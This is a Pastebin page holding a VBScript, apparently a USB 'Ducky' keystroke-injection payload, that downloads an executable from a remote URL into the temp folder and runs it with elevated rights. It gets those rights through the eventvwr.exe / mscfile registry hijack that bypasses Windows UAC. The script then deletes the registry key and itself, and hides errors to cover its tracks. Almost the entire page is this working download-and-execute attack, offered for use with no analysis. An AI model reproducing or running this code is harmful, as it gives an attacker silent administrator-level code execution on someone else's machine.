SHARE
TWEET

DUCKY: 2-4 second download + execute with UAC Bypass

a guest Nov 18th, 2016 343 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Sub Main()
  2. 'Setting some vars
  3. fileurl = "https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"
  4. filename = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) & "/pt.exe"
  5.  
  6. 'Download function
  7. dim shellobj
  8. set shellobj = wscript.createobject("wscript.shell")
  9. set objhttpdownload = createobject("msxml2.xmlhttp" )
  10. objhttpdownload.open "get", fileurl, false
  11. objhttpdownload.send
  12. set objfsodownload = createobject ("scripting.filesystemobject")
  13. if  objfsodownload.fileexists (filename) then
  14.     objfsodownload.deletefile (filename)
  15. end if
  16.  if objhttpdownload.status = 200 then
  17.    dim  objstreamdownload
  18.    set  objstreamdownload = createobject("adodb.stream")
  19.    with objstreamdownload
  20.         .type = 1
  21.         .open
  22.         .write objhttpdownload.responsebody
  23.         .savetofile filename
  24.         .close
  25.    end with
  26.    set objstreamdownload = nothing
  27. end if
  28.  
  29. 'UAC bypass/exploit setup
  30. Set WshShell = CreateObject("WScript.Shell")
  31. myKey = "HKCU\Software\Classes\mscfile\shell\open\command\"
  32. WshShell.RegWrite myKey,filename ,"REG_SZ"
  33.  
  34. 'UAC bypass/exploit trigger
  35. CreateObject("WScript.Shell").Run "eventvwr.exe"
  36.  
  37. WScript.Sleep 1000
  38.  
  39. 'UAC bypass/exploit cleanup
  40. Set objShell = Wscript.CreateObject("Wscript.Shell")
  41. objShell.RegDelete "HKCU\Software\Classes\mscfile\shell\open\command\"
  42.  
  43.  
  44. 'Cleanup removal of this script after completed
  45. Set Cleanup = WScript.CreateObject("WScript.Shell")
  46. Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True
  47.  
  48. End Sub
  49.  
  50. 'We dont want to display any errors
  51. On Error Resume Next
  52.   Main
  53.   If Err.Number Then
  54.      'on error cleanup and exit
  55.      set Cleanup = WScript.CreateObject("WScript.Shell")
  56.      Cleanup.Run "cmd /c del %temp%\run.vbs", 0, True
  57.      WScript.Quit 4711
  58. End If
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top